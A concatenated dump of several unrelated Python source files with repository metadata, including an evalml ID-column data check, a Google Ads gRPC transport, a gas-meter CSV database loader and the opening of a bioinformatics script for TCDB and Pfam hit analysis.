    BUILDCOM = "${TEMPFILE('$\\"BUILDBIN\\" $TARGET $SOURCES')}",
    MAXLINELENGTH = 32,
)
env.Command('foo.out', ['%s' %% x for x in range(0,%d)], '$BUILDCOM')
""" % (binFullName,sourceTemplate,numFiles) )
for x in range(0, numFiles ) :
    test.write( [sourcePath,sourceName % x] , "dummy\n")

# Run the build and verify foo.out received the quoted source list that was
# passed through the tempfile.
test.run(arguments = ' --quiet -Q .', stdout = '' )
output = ' '.join( ['"' + sourceTemplate % (x) + '"' for x in range(0, numFiles)] )
test.must_match( 'foo.out', output )

test.pass_test()
1e4459c7be221a95b486ae16c1fa2ae7ba81d454 | 7,408 | py | Python | evalml/data_checks/id_columns_data_check.py | ColinRTaylor/evalml | ef4374494b50e22757f44edb753e54efbf71f430 | [
"BSD-3-Clause"
] | null | null | null | evalml/data_checks/id_columns_data_check.py | ColinRTaylor/evalml | ef4374494b50e22757f44edb753e54efbf71f430 | [
"BSD-3-Clause"
] | 1 | 2022-02-19T12:59:09.000Z | 2022-02-19T12:59:09.000Z | evalml/data_checks/id_columns_data_check.py | isabella232/evalml | 5b372d0dfac05ff9b7e41eb494a9df1bf2da4a9d | [
"BSD-3-Clause"
] | null | null | null | """Data check that checks if any of the features are likely to be ID columns."""
from evalml.data_checks import (
DataCheck,
DataCheckActionCode,
DataCheckActionOption,
DataCheckMessageCode,
DataCheckWarning,
)
from evalml.utils import infer_feature_types
class IDColumnsDataCheck(DataCheck):
    """Check if any of the features are likely to be ID columns.

    Args:
        id_threshold (float): The probability threshold to be considered an ID column. Defaults to 1.0.
    """

    def __init__(self, id_threshold=1.0):
        # Threshold must be a valid probability; reject anything outside [0, 1].
        if id_threshold < 0 or id_threshold > 1:
            raise ValueError("id_threshold must be a float between 0 and 1, inclusive.")
        self.id_threshold = id_threshold

    def validate(self, X, y=None):
        """Check if any of the features are likely to be ID columns. Currently performs a number of simple checks.

        Checks performed are:

            - column name is "id"
            - column name ends in "_id"
            - column contains all unique values (and is categorical / integer type)

        Args:
            X (pd.DataFrame, np.ndarray): The input features to check.
            y (pd.Series): The target. Defaults to None. Ignored.

        Returns:
            dict: A dictionary of features with column name or index and their probability of being ID columns

        Examples:
            >>> import pandas as pd

            Columns that end in "_id" and are completely unique are likely to be ID columns.

            >>> df = pd.DataFrame({
            ...     "customer_id": [123, 124, 125, 126, 127],
            ...     "Sales": [10, 42, 31, 51, 61]
            ... })
            ...
            >>> id_col_check = IDColumnsDataCheck()
            >>> assert id_col_check.validate(df) == [
            ...     {
            ...         "message": "Columns 'customer_id' are 100.0% or more likely to be an ID column",
            ...         "data_check_name": "IDColumnsDataCheck",
            ...         "level": "warning",
            ...         "code": "HAS_ID_COLUMN",
            ...         "details": {"columns": ["customer_id"], "rows": None},
            ...         "action_options": [
            ...             {
            ...                 "code": "DROP_COL",
            ...                 "data_check_name": "IDColumnsDataCheck",
            ...                 "parameters": {},
            ...                 "metadata": {"columns": ["customer_id"], "rows": None}
            ...             }
            ...         ]
            ...     }
            ... ]

            Columns named "ID" with all unique values will also be identified as ID columns.

            >>> df = df.rename(columns={"customer_id": "ID"})
            >>> id_col_check = IDColumnsDataCheck()
            >>> assert id_col_check.validate(df) == [
            ...     {
            ...         "message": "Columns 'ID' are 100.0% or more likely to be an ID column",
            ...         "data_check_name": "IDColumnsDataCheck",
            ...         "level": "warning",
            ...         "code": "HAS_ID_COLUMN",
            ...         "details": {"columns": ["ID"], "rows": None},
            ...         "action_options": [
            ...             {
            ...                 "code": "DROP_COL",
            ...                 "data_check_name": "IDColumnsDataCheck",
            ...                 "parameters": {},
            ...                 "metadata": {"columns": ["ID"], "rows": None}
            ...             }
            ...         ]
            ...     }
            ... ]

            Despite being all unique, "Country_Rank" will not be identified as an ID column as id_threshold is set to 1.0
            by default and its name doesn't indicate that it's an ID.

            >>> df = pd.DataFrame({
            ...     "Country_Rank": [1, 2, 3, 4, 5],
            ...     "Sales": ["very high", "high", "high", "medium", "very low"]
            ... })
            ...
            >>> id_col_check = IDColumnsDataCheck()
            >>> assert id_col_check.validate(df) == []

            However lowering the threshold will cause this column to be identified as an ID.

            >>> id_col_check = IDColumnsDataCheck()
            >>> id_col_check = IDColumnsDataCheck(id_threshold=0.95)
            >>> assert id_col_check.validate(df) == [
            ...     {
            ...         "message": "Columns 'Country_Rank' are 95.0% or more likely to be an ID column",
            ...         "data_check_name": "IDColumnsDataCheck",
            ...         "level": "warning",
            ...         "details": {"columns": ["Country_Rank"], "rows": None},
            ...         "code": "HAS_ID_COLUMN",
            ...         "action_options": [
            ...             {
            ...                 "code": "DROP_COL",
            ...                 "data_check_name": "IDColumnsDataCheck",
            ...                 "parameters": {},
            ...                 "metadata": {"columns": ["Country_Rank"], "rows": None}
            ...             }
            ...         ]
            ...     }
            ... ]
        """
        messages = []

        X = infer_feature_types(X)
        col_names = [col for col in X.columns]
        # Name-based signal: a column literally named "id" (any case) starts
        # at probability 0.95.
        cols_named_id = [
            col for col in col_names if (str(col).lower() == "id")
        ]  # columns whose name is "id"
        id_cols = {col: 0.95 for col in cols_named_id}

        # Value-based signal only applies to integer/categorical columns.
        X = X.ww.select(include=["Integer", "Categorical"])

        # A column whose values are all unique gets 0.95, or 1.0 if it was
        # already flagged by name.
        check_all_unique = X.nunique() == len(X)
        cols_with_all_unique = check_all_unique[
            check_all_unique
        ].index.tolist()  # columns whose values are all unique
        id_cols.update(
            [
                (col, 1.0) if col in id_cols else (col, 0.95)
                for col in cols_with_all_unique
            ]
        )

        # Suffix-based signal: "_id" names get 0.95, or 1.0 when combined
        # with an earlier signal.
        # NOTE(review): this membership test uses str(col) while the
        # all-unique branch above uses col directly -- for non-string column
        # labels these may disagree; confirm intended behavior.
        col_ends_with_id = [
            col for col in col_names if str(col).lower().endswith("_id")
        ]  # columns whose name ends with "_id"
        id_cols.update(
            [
                (col, 1.0) if str(col) in id_cols else (col, 0.95)
                for col in col_ends_with_id
            ]
        )

        # Emit one aggregated warning (with a DROP_COL action) covering every
        # column at or above the configured threshold.
        id_cols_above_threshold = {
            key: value for key, value in id_cols.items() if value >= self.id_threshold
        }
        if id_cols_above_threshold:
            warning_msg = "Columns {} are {}% or more likely to be an ID column"
            messages.append(
                DataCheckWarning(
                    message=warning_msg.format(
                        (", ").join(
                            ["'{}'".format(str(col)) for col in id_cols_above_threshold]
                        ),
                        self.id_threshold * 100,
                    ),
                    data_check_name=self.name,
                    message_code=DataCheckMessageCode.HAS_ID_COLUMN,
                    details={"columns": list(id_cols_above_threshold)},
                    action_options=[
                        DataCheckActionOption(
                            DataCheckActionCode.DROP_COL,
                            data_check_name=self.name,
                            metadata={"columns": list(id_cols_above_threshold)},
                        )
                    ],
                ).to_dict()
            )
        return messages
| 40.26087 | 121 | 0.470572 |
5902c4103e325ab859e0b6bccadb77b72f64c38e | 807 | py | Python | examples/suggest.py | ericmc21/python-api | eacc3c7f2e14103ff4d2138b85905cefdb6946c6 | [
"Apache-2.0"
] | null | null | null | examples/suggest.py | ericmc21/python-api | eacc3c7f2e14103ff4d2138b85905cefdb6946c6 | [
"Apache-2.0"
] | null | null | null | examples/suggest.py | ericmc21/python-api | eacc3c7f2e14103ff4d2138b85905cefdb6946c6 | [
"Apache-2.0"
] | null | null | null | import config
config.setup_examples()
import infermedica_api
if __name__ == '__main__':
api = infermedica_api.get_api()
# Prepare the diagnosis request object
request = infermedica_api.Diagnosis(sex='male', age=30)
request.add_symptom('s_1193', 'present')
request.add_symptom('s_488', 'present')
request.add_symptom('s_418', 'absent')
# Alternatively prepare a dict based request object
# request = {
# 'sex': 'male',
# 'age': 30,
# 'evidence': [
# {'id': 's_1193', 'choice_id': 'present'},
# {'id': 's_488', 'choice_id': 'present'},
# {'id': 's_418', 'choice_id': 'absent'}
# ]
# }
# call triage method
request = api.suggest(request)
# and see the results
print('\n\n', request)
| 25.21875 | 59 | 0.582404 |
941cbf414ce71f3e04619fa1d65e9080e660d806 | 6,276 | py | Python | database.py | Shafiq-Kyazze/GazProm-Data-Engineering-Project | 70caec74e925f84272436b6c85acfe2918ab91ae | [
"MIT"
] | null | null | null | database.py | Shafiq-Kyazze/GazProm-Data-Engineering-Project | 70caec74e925f84272436b6c85acfe2918ab91ae | [
"MIT"
] | null | null | null | database.py | Shafiq-Kyazze/GazProm-Data-Engineering-Project | 70caec74e925f84272436b6c85acfe2918ab91ae | [
"MIT"
] | null | null | null | ##### database.py ####
from config import Database_URI
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import os
import pandas as pd
from datetime import datetime
from models import HEADR,CONSU,Base
from sqlalchemy.exc import IntegrityError
import shutil

# Connecting to database
engine = create_engine(Database_URI, echo=False)
# Binding session to engine i.e specific database
Session= sessionmaker(bind=engine)
s = Session()  # Allows python to interact with PostgreSQL
# Creating tables after importing original Base from models module
Base.metadata.create_all(bind=engine)
s.commit()  # committing newly created tables

# File paths showing where the different files are.
# NOTE(review): absolute Windows paths hard-coded to one machine -- consider
# moving these into config.
Original_data_folder = "C:/Users/shafi/Dropbox/Data Science Projects/GAZPROM/GazProm-Data-Engineering-Project/sample_data/"
uploaded_data_folder= "C:/Users/shafi/Dropbox/Data Science Projects/GAZPROM/GazProm-Data-Engineering-Project/Uploaded data/"
Bad_data_folder= "C:/Users/shafi/Dropbox/Data Science Projects/GAZPROM/GazProm-Data-Engineering-Project/Bad data/"
files = os.listdir(Original_data_folder)
# Function that converts the time to correct format
def time_convertor(raw_time):
    """Convert a numeric HHMM reading (e.g. 930.0) to a datetime.time.

    The raw value is truncated to an integer and left-padded with zeros to
    four digits, so 930.0 becomes "0930" -> 09:30 and 5.0 becomes
    "0005" -> 00:05.

    Args:
        raw_time: float or int encoding a time as HHMM.

    Returns:
        datetime.time parsed from the padded HHMM string.

    Raises:
        ValueError: if the padded string is not a valid HHMM time.
    """
    # zfill replaces the original manual '0' * missing padding and collapses
    # the duplicated <4-digit / 4-digit branches into one code path.
    hhmm = str(int(raw_time)).zfill(4)
    return datetime.strptime(hhmm, "%H%M").time()
for file in files:
    df = pd.read_csv(Original_data_folder+file)  # Pandas dataframe for a given file
    To_Head = list(df.columns)  # Column row doubles as the file's HEADR record
    N_rows = len(df.index) - 1  # Number of rows in dataframe excluding the footer
    # Only process files whose header/footer markers prove a complete transfer
    if (To_Head[0] == 'HEADR') & (df.iloc[-1][0] == 'TRAIL'):
        df.drop(df.columns[-1], axis=1, inplace=True)  # Dropping File_Generation_Number column since it's the last column
        df.dropna(inplace=True, how='any', axis=0)  # Dropping the footer row
        Creation_date = datetime.strptime(To_Head[3], "%Y%m%d").date()  # Date conversion
        Creation_time = datetime.strptime(To_Head[4], "%H%M%S").time()  # Time conversion
        To_Head.pop(3)  # Removing date string from list
        To_Head.pop(3)  # Removing time string from list
        To_Head.insert(3, Creation_date)  # inserting the newly converted date back into the list
        To_Head.insert(4, Creation_time)  # inserting the newly converted time back into the list
        # Normalise the measurement time (HHMM float) and date (YYYYMMDD float) columns
        df[df.columns[3]] = df[df.columns[3]].apply(lambda x: time_convertor(x))
        df[df.columns[2]] = df[df.columns[2]].apply(lambda x: datetime.strptime(str(int(x)), "%Y%m%d").date())
        # List of data rows as tuples
        rows = list(map(tuple, df.to_numpy()))
        # Try block deals with non-unique File Generation Numbers (FGN), to make
        # sure the same file isn't uploaded again.
        try:
            headers = HEADR(
                Number_of_rows = N_rows,File_Type=To_Head[1], Company_ID=To_Head[2],
                File_Creation_Date=To_Head[3], File_Creation_Time=To_Head[4], File_Generation_Number=To_Head[5])
            s.add(headers)
            s.commit()
            for row in rows:
                # Overwrite query: does a record with the same meter number and
                # measurement date/time already exist?
                over_write_query =s.query(CONSU).filter(CONSU.Meter_Number == float(row[1]),
                    CONSU.Measurement_Date == row[2], CONSU.Measurement_Time ==row[3] ).first()
                if over_write_query is not None:
                    # Row in database with matching parameters is overwritten
                    over_write_result = s.query(CONSU).filter(CONSU.Meter_Number == float(row[1]), CONSU.Measurement_Date == row[2],
                        CONSU.Measurement_Time ==row[3]).update({CONSU.Record_Identifier:row[0],
                        CONSU.Meter_Number: float(row[1]), CONSU.Measurement_Date: row[2],
                        CONSU.Measurement_Time:row[3],CONSU.Consumption:float(row[4]),
                        CONSU.Header_id:headers.id}, synchronize_session="evaluate")
                else:
                    consus = CONSU(Record_Identifier=row[0], Meter_Number=float(row[1]), Measurement_Date=row[2],
                        Measurement_Time=row[3], Consumption=float(row[4]), Header_id=headers.id)
                    s.add(consus)  # Inserting rows in table
            # Moving file to the uploaded folder to prevent duplication
            Old_location = Original_data_folder + file  # Original data folder
            New_location = uploaded_data_folder + file  # Target data folder
            shutil.move(Old_location, New_location)
        except IntegrityError:  # Raised when the File Generation Number is non-unique
            s.rollback()  # Rolls back the current session
            # Moving repeated file to the bad data folder
            Old_location = Original_data_folder + file  # Original data folder
            Target_location = Bad_data_folder+file
            shutil.move(Old_location,Target_location)
    else:
        # Incomplete transfer: moving bad data to bad data folder
        Old_location = Original_data_folder + file  # Original data folder
        Target_location = Bad_data_folder + file  # Target location for bad data
        shutil.move(Old_location, Target_location)
# Pushing all the changes to the Database
s.commit()
# Ending any transactions in progress
s.close()
279d297050b7eb4b5ec43cc2a980a9250677d9fc | 3,201 | py | Python | test/test_search_entity.py | kryptoslogic/unpacme-python | 86529853f24ed00afa7e90b87fa64104dfc68dfe | [
"MIT"
] | null | null | null | test/test_search_entity.py | kryptoslogic/unpacme-python | 86529853f24ed00afa7e90b87fa64104dfc68dfe | [
"MIT"
] | null | null | null | test/test_search_entity.py | kryptoslogic/unpacme-python | 86529853f24ed00afa7e90b87fa64104dfc68dfe | [
"MIT"
] | null | null | null | """
UnpacMe
# Introduction Welcome to the UNPACME API! All the malware unpacking and file analysis features that you are familiar with on the [unpac.me](https://www.unpac.me/) website are available through our API. You can easily integrate our unpacker into your malware analysis pipeline and begin unpacking at scale! # Authentication The public UNPACME API is publicly available and can be accessed without authentication. In order to use the private UNPACME API you must sign up for an account with UNPACME. Once you have a valid user account you can view your personal API key in your user profile. <SecurityDefinitions /> # Response Structure When interacting with the UNPACME API, if the request was correctly handled, a <b>200</b> HTTP status code will be returned. The body of the response will usually be a JSON object (except for file downloads). ## Response Status Codes Status Code | Description | Notes ------------- | ------------- | - 200 | OK | The request was successful 400 | Bad Request | The request was somehow incorrect. This can be caused by missing arguments or arguments with wrong values. 401 | Unauthorized | The supplied credentials, if any, are not sufficient to access the resource 403 | Forbidden | The account does not have enough privileges to make the request. 404 | Not Found | The requested resource is not found 429 | Too Many Requests | The request frequency has exceeded one of the account quotas (minute, daily or monthly). Monthly quotas are reset on the 1st of the month at 00:00 UTC. 500 | Server Error | The server could not return the representation due to an internal server error ## Error Response If an error has occurred while handling the request an error status code will be returend along with a JSON error message with the following properties. 
Property | Description ------------- | ------------- Error | The error type Description | A more informative message # Example Clients The following clients can be used to interact with the UNPACME API directly and are provided as examples. These clients are community projects and are not maintained or developed by UNPACME. UNPACME makes no claim as to the safety of these clients, use at your own risk. - [UnpacMe Python Client](https://github.com/larsborn/UnpacMeClient) (Python) - [UnpacMe GO Client](https://github.com/kryptoslogic/unpacme-go) (Golang) - [UnpacMe Library](https://github.com/R3MRUM/unpacme) (Python) - [AssemblyLine](https://github.com/CybercentreCanada/assemblyline-service-unpacme) (Automation Service) <br> # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import unpacme
from unpacme.model.search_entity import SearchEntity
class TestSearchEntity(unittest.TestCase):
    """SearchEntity unit test stubs (auto-generated by openapi-generator)."""

    def setUp(self):
        # No fixtures needed yet.
        pass

    def tearDown(self):
        # Nothing to clean up.
        pass

    def testSearchEntity(self):
        """Test SearchEntity"""
        # FIXME: construct object with mandatory attributes with example values
        # model = SearchEntity()  # noqa: E501
        pass
if __name__ == '__main__':
unittest.main()
| 88.916667 | 2,573 | 0.739144 |
9b816d06f19a09f6df42533fd92081c66a2343d9 | 11,778 | py | Python | google/ads/googleads/v4/services/services/billing_setup_service/transports/grpc.py | batardo/google-ads-python | a39748521847e85138fca593f3be2681352ad024 | [
"Apache-2.0"
] | null | null | null | google/ads/googleads/v4/services/services/billing_setup_service/transports/grpc.py | batardo/google-ads-python | a39748521847e85138fca593f3be2681352ad024 | [
"Apache-2.0"
] | null | null | null | google/ads/googleads/v4/services/services/billing_setup_service/transports/grpc.py | batardo/google-ads-python | a39748521847e85138fca593f3be2681352ad024 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google import auth # type: ignore
from google.auth import credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.ads.googleads.v4.resources.types import billing_setup
from google.ads.googleads.v4.services.types import billing_setup_service
from .base import BillingSetupServiceTransport, DEFAULT_CLIENT_INFO
class BillingSetupServiceGrpcTransport(BillingSetupServiceTransport):
    """gRPC backend transport for BillingSetupService.
    A service for designating the business entity responsible for
    accrued costs.
    A billing setup is associated with a payments account. Billing-
    related activity for all billing setups associated with a
    particular payments account will appear on a single invoice
    generated monthly.
    Mutates:
    The REMOVE operation cancels a pending billing setup. The CREATE
    operation creates a new billing setup.
    This class defines the same methods as the primary client, so the
    primary client can load the underlying transport implementation
    and call it.
    It sends protocol buffers over the wire using gRPC (which is built on
    top of HTTP/2); the ``grpcio`` package must be installed.
    """
    def __init__(
        self,
        *,
        host: str = "googleads.googleapis.com",
        credentials: credentials.Credentials = None,
        credentials_file: str = None,
        scopes: Sequence[str] = None,
        channel: grpc.Channel = None,
        api_mtls_endpoint: str = None,
        client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
        ssl_channel_credentials: grpc.ChannelCredentials = None,
        quota_project_id: Optional[str] = None,
        client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
    ) -> None:
        """Instantiate the transport.
        Args:
            host (Optional[str]): The hostname to connect to.
            credentials (Optional[google.auth.credentials.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify the application to the service; if none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
                This argument is ignored if ``channel`` is provided.
            credentials_file (Optional[str]): A file with credentials that can
                be loaded with :func:`google.auth.load_credentials_from_file`.
                This argument is ignored if ``channel`` is provided.
            scopes (Optional(Sequence[str])): A list of scopes. This argument is
                ignored if ``channel`` is provided.
            channel (Optional[grpc.Channel]): A ``Channel`` instance through
                which to make calls.
            api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
                If provided, it overrides the ``host`` argument and tries to create
                a mutual TLS channel with client SSL credentials from
                ``client_cert_source`` or application default SSL credentials.
            client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
                Deprecated. A callback to provide client SSL certificate bytes and
                private key bytes, both in PEM format. It is ignored if
                ``api_mtls_endpoint`` is None.
            ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
                for grpc channel. It is ignored if ``channel`` is provided.
            quota_project_id (Optional[str]): An optional project to use for billing
                and quota.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.
        Raises:
            google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
                creation failed for any reason.
        """
        self._ssl_channel_credentials = ssl_channel_credentials
        if channel:
            # Sanity check: Ensure that channel and credentials are not both
            # provided.
            # NOTE(review): credentials is set to False (not None) here,
            # presumably so the base transport does not try to resolve
            # default credentials — confirm against the base class __init__.
            credentials = False
            # If a channel was explicitly provided, set it.
            self._grpc_channel = channel
            self._ssl_channel_credentials = None
        elif api_mtls_endpoint:
            # Deprecated mutual-TLS path: normalise the endpoint to host:port,
            # resolve credentials if needed, and build SSL credentials either
            # from the supplied client certificate callback or from ADC.
            warnings.warn(
                "api_mtls_endpoint and client_cert_source are deprecated",
                DeprecationWarning,
            )
            host = (
                api_mtls_endpoint
                if ":" in api_mtls_endpoint
                else api_mtls_endpoint + ":443"
            )
            if credentials is None:
                credentials, _ = auth.default(
                    scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id
                )
            # Create SSL credentials with client_cert_source or application
            # default SSL credentials.
            if client_cert_source:
                cert, key = client_cert_source()
                ssl_credentials = grpc.ssl_channel_credentials(
                    certificate_chain=cert, private_key=key
                )
            else:
                ssl_credentials = SslCredentials().ssl_credentials
            # create a new channel. The provided one is ignored.
            self._grpc_channel = type(self).create_channel(
                host,
                credentials=credentials,
                credentials_file=credentials_file,
                ssl_credentials=ssl_credentials,
                scopes=scopes or self.AUTH_SCOPES,
                quota_project_id=quota_project_id,
                options=[
                    ("grpc.max_send_message_length", -1),
                    ("grpc.max_receive_message_length", -1),
                ],
            )
            self._ssl_channel_credentials = ssl_credentials
        else:
            # Standard path: no explicit channel and no mTLS endpoint.
            host = host if ":" in host else host + ":443"
            if credentials is None:
                credentials, _ = auth.default(scopes=self.AUTH_SCOPES)
            # create a new channel. The provided one is ignored.
            self._grpc_channel = type(self).create_channel(
                host,
                credentials=credentials,
                ssl_credentials=ssl_channel_credentials,
                scopes=self.AUTH_SCOPES,
                options=[
                    ("grpc.max_send_message_length", -1),
                    ("grpc.max_receive_message_length", -1),
                ],
            )
        # Cache of lazily-created RPC stubs, keyed by method name.
        self._stubs = {}  # type: Dict[str, Callable]
        # Run the base constructor.
        super().__init__(
            host=host, credentials=credentials, client_info=client_info,
        )
    @classmethod
    def create_channel(
        cls,
        host: str = "googleads.googleapis.com",
        credentials: credentials.Credentials = None,
        scopes: Optional[Sequence[str]] = None,
        **kwargs,
    ) -> grpc.Channel:
        """Create and return a gRPC channel object.
        Args:
            address (Optional[str]): The host for the channel to use.
            credentials (Optional[~.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify this application to the service. If
                none are specified, the client will attempt to ascertain
                the credentials from the environment.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
                service. These are only used when credentials are not specified and
                are passed to :func:`google.auth.default`.
            kwargs (Optional[dict]): Keyword arguments, which are passed to the
                channel creation.
        Returns:
            grpc.Channel: A gRPC channel object.
        """
        return grpc_helpers.create_channel(
            host,
            credentials=credentials,
            scopes=scopes or cls.AUTH_SCOPES,
            **kwargs,
        )
    @property
    def grpc_channel(self) -> grpc.Channel:
        """Return the channel designed to connect to this service.
        """
        return self._grpc_channel
    @property
    def get_billing_setup(
        self,
    ) -> Callable[
        [billing_setup_service.GetBillingSetupRequest],
        billing_setup.BillingSetup,
    ]:
        r"""Return a callable for the get billing setup method over gRPC.
        Returns a billing setup.
        Returns:
            Callable[[~.GetBillingSetupRequest],
                    ~.BillingSetup]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if "get_billing_setup" not in self._stubs:
            self._stubs["get_billing_setup"] = self.grpc_channel.unary_unary(
                "/google.ads.googleads.v4.services.BillingSetupService/GetBillingSetup",
                request_serializer=billing_setup_service.GetBillingSetupRequest.serialize,
                response_deserializer=billing_setup.BillingSetup.deserialize,
            )
        return self._stubs["get_billing_setup"]
    @property
    def mutate_billing_setup(
        self,
    ) -> Callable[
        [billing_setup_service.MutateBillingSetupRequest],
        billing_setup_service.MutateBillingSetupResponse,
    ]:
        r"""Return a callable for the mutate billing setup method over gRPC.
        Creates a billing setup, or cancels an existing
        billing setup.
        Returns:
            Callable[[~.MutateBillingSetupRequest],
                    ~.MutateBillingSetupResponse]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if "mutate_billing_setup" not in self._stubs:
            self._stubs["mutate_billing_setup"] = self.grpc_channel.unary_unary(
                "/google.ads.googleads.v4.services.BillingSetupService/MutateBillingSetup",
                request_serializer=billing_setup_service.MutateBillingSetupRequest.serialize,
                response_deserializer=billing_setup_service.MutateBillingSetupResponse.deserialize,
            )
        return self._stubs["mutate_billing_setup"]
__all__ = ("BillingSetupServiceGrpcTransport",)
| 41.471831 | 99 | 0.630667 |
43077cf62285f87e0dcd29ca4a761335b0191c06 | 62,785 | py | Python | YutanpaNet.py | MogicianEik/YutanpaNet | 04cd79c51be37d23888db067712946d5620976cf | [
"MIT"
] | null | null | null | YutanpaNet.py | MogicianEik/YutanpaNet | 04cd79c51be37d23888db067712946d5620976cf | [
"MIT"
] | null | null | null | YutanpaNet.py | MogicianEik/YutanpaNet | 04cd79c51be37d23888db067712946d5620976cf | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
import networkx as nx
import math
import os
from hmmscanParser import hmmParser
import argparse
from toolz import unique
from Bio import SeqIO
import subprocess
import more_itertools as mit
import operator
import json
import argparse
import sys
import os.path
import random
import sys
# Column names for the per-domain hit rows returned by hmmscanParser.hmmParser
# (appears to follow hmmscan's --domtblout column layout — confirm against
# hmmscanParser). Used to build DataFrames in get_info().
header = ["tname", "tacc", "tlen", "qname","qacc", "qlen", "E-value", "score", "bias", "#", "of","c-Evalue", "i-Evalue", "score", "bias", "hfrom", "hto","afrom", "ato", "efrom", "eto", "acc", "description of target"]
# In[2]:
def get_rawdata(raw_table_file):
    """Load the tab-separated raw hit table and normalise it.

    Reorders the columns, sorts by (tcid, subject, evalue asc, neighbors
    desc), and disambiguates accessions that appear both as a genome
    subject and as a TCDB query by tagging them ':genome' / ':tcdb'.

    Returns (DataFrame, list_of_duplicated_accessions_before_tagging).
    """
    frame = pd.read_csv(raw_table_file, sep='\t', encoding="ISO-8859-1")
    ordered_cols = ['subject_accession', 'tcid', 'query_accession', 'subject_tms',
                    'query_tms', 'status', 'query_length', 'subject_length',
                    'evalue', 'perc_idenity', 'alignment_length',
                    'query_coverage', 'subject_coverage', 'neighbors']
    frame = frame[ordered_cols]
    frame.sort_values(by=['tcid', 'subject_accession', 'evalue', 'neighbors'],
                      ascending=[True, True, True, False], inplace=True)
    # An accession shared by both sides would collapse into a single graph
    # node later on, so each occurrence is tagged with its origin.
    repeats = list(set(frame['query_accession']) & set(frame['subject_accession']))
    if repeats:
        dup = set(repeats)
        subj_mask = frame['subject_accession'].isin(dup)
        query_mask = frame['query_accession'].isin(dup)
        frame.loc[subj_mask, 'subject_accession'] = frame.loc[subj_mask, 'subject_accession'] + ':genome'
        frame.loc[query_mask, 'query_accession'] = frame.loc[query_mask, 'query_accession'] + ':tcdb'
    return frame, repeats
# In[3]:
def get_mc(tcdb_faa, repeats):
    '''
    Parse a TCDB fasta file (record ids shaped '<tcid>-<accession>') and
    return only the multi-component systems as {tcid: [accessions]}.
    Accessions that also occur in the genome (listed in *repeats*) are
    tagged ':tcdb' to keep graph node names unambiguous.
    '''
    systems = dict()
    with open(tcdb_faa, 'r') as handle:
        for record in SeqIO.parse(handle, 'fasta'):
            id_parts = record.id.split('-')
            tcid = id_parts[0]
            acc = id_parts[1]
            if acc in repeats:
                acc = acc + ':tcdb'
            systems.setdefault(tcid, []).append(acc)
    # Keep only systems composed of more than one protein.
    return {tcid: members for tcid, members in systems.items() if len(members) > 1}
def get_info(qacc_list, sacc_list, address='/ResearchData/Users/amedrano/RalfRabus/MultiomponentSystems/Desulfococcus_multivorans',clan_info_file='/ResearchData/pfam/download/Pfam-A.clans.tsv.gz' ):
    """Collect Pfam domain hits for every (query, subject) pair.

    For each pair, parses the per-pair hmmscan output found under
    *address*/plots/... and returns a nested dict:
        {protein_accession: {pfam_accession: {'cood': [[from, to], ...],
                                              'clan': clan_accession}}}
    Coordinates are the envelope (efrom/eto) columns, de-duplicated and
    sorted. Pairs whose subject is NaN (no hit) are skipped.
    Keys are the accessions as they appear in the hmmscan output, i.e.
    without any ':genome'/':tcdb' tag.
    """
    # eg: add = 'plots/Q92TN4_vs_Dmul_22110/ssearch_Dmul_22110_vs_Q92TN4/files/'
    pfam_dic = dict()
    # Pfam-A.clans.tsv maps each domain accession to its clan accession.
    clan_df = pd.read_csv(clan_info_file,sep='\t')
    clan_df.columns = ['dacc','cacc','name','des1','des2']
    clan_dic = dict(zip(clan_df['dacc'].values, clan_df['cacc'].values))
    pairs = zip(qacc_list,sacc_list)
    for p in pairs:
        if str(p[1])=='nan':
            continue
        # Per-pair hmmscan output; the tag after ':' is stripped because the
        # directory names use the bare accessions.
        hmmscan = os.path.join(address,'plots/{}_vs_{}/ssearch_{}_vs_{}/files/hmmscan.out'.format(p[0].split(":")[0],p[1].split(":")[0],p[1].split(":")[0],p[0].split(":")[0]))
        hmm = hmmParser(hmmscan)
        df=pd.DataFrame(hmm.matrix,columns=header)
        for index, row in df.iterrows():
            # qname looks like '<tcid>-<accession>'; keep the accession part.
            qname = row['qname'].split('-')[-1]
            if qname not in pfam_dic:
                pfam_dic[qname] = {}
            # Drop the Pfam version suffix (e.g. 'PF00001.21' -> 'PF00001').
            pacc = row['tacc'].split('.')[0]
            if pacc not in pfam_dic[qname]: # get rid of ":"
                pfam_dic[qname][pacc] = {}
                pfam_dic[qname][pacc]['cood'] = [[int(row['efrom']),int(row['eto'])]]
